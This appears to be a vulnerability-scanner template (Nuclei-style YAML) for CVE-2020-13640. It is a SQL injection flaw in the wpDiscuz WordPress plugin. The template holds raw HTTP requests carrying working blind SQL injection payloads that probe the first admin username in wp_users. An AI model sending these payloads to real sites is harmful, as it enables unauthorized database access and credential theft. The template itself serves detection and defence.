漏洞描述
A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request.
id: CVE-2020-13640
info:
name: wpDiscuz <= 5.3.5 - SQL Injection
author: Sourabh-Sahu
severity: critical
description: |
A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request.
reference:
- https://github.com/asterite3/CVE-2020-13640
- https://nvd.nist.gov/vuln/detail/CVE-2020-13640
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-13640
epss-score: 0.2192
epss-percentile: 0.95579
cwe-id: CWE-89
cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
verified: true
vendor: gvectors
product: wpdiscuz
fofa-query: body="/wp-content/plugins/wpdiscuz"
tags: cve,cve2020,wordpress,wp,wp-plugin,wpdiscuz,sqli,vkev
flow: |
http(1)
set("postid", iterate(template.postid)[0])
http(2) && http(3)
http:
- raw:
- |
GET /wp-json/wp/v2/comments HTTP/1.1
Host: {{Host}}
stop-at-first-match: true
extractors:
- type: regex
name: postid
part: body
group: 1
regex:
- 'post"\s*:\s*([0-9]+)'
internal: true
- raw:
- |
POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1
Host: {{Host}}
Content-Type: application/x-www-form-urlencoded
Connection: close
action=wpdLoadMoreComments&offset=1&orderBy=comment_date_gmt&order=, (SELECT CASE WHEN (ORD(SUBSTRING((SELECT user_login FROM wp_users LIMIT 0,1),1,1)) > 96) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)=1 ASC #&lastParentId=&postId={{postid}}
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- 'comment_list":"<div id=\"wc-comm'
internal: true
- raw:
- |
POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1
Host: {{Host}}
Content-Type: application/x-www-form-urlencoded
Connection: close
action=wpdLoadMoreComments&offset=1&orderBy=comment_date_gmt&order=, (SELECT CASE WHEN (ORD(SUBSTRING((SELECT user_login FROM wp_users LIMIT 0,1),1,1)) > 97) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)=1 ASC #&lastParentId=&postId={{postid}}
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- '"comment_list":null'
condition: and
# digest: 4a0a00473045022100e7f18e610ec50682c296a5e34f80c1785a10125d9a9556f6acaa1e6b69dda2d402205c59454e44d6682b2628f9486ffba0e163441499bb3aedc98a5078ad4dba0bad:922c64590222798bb761d5b6d8e72950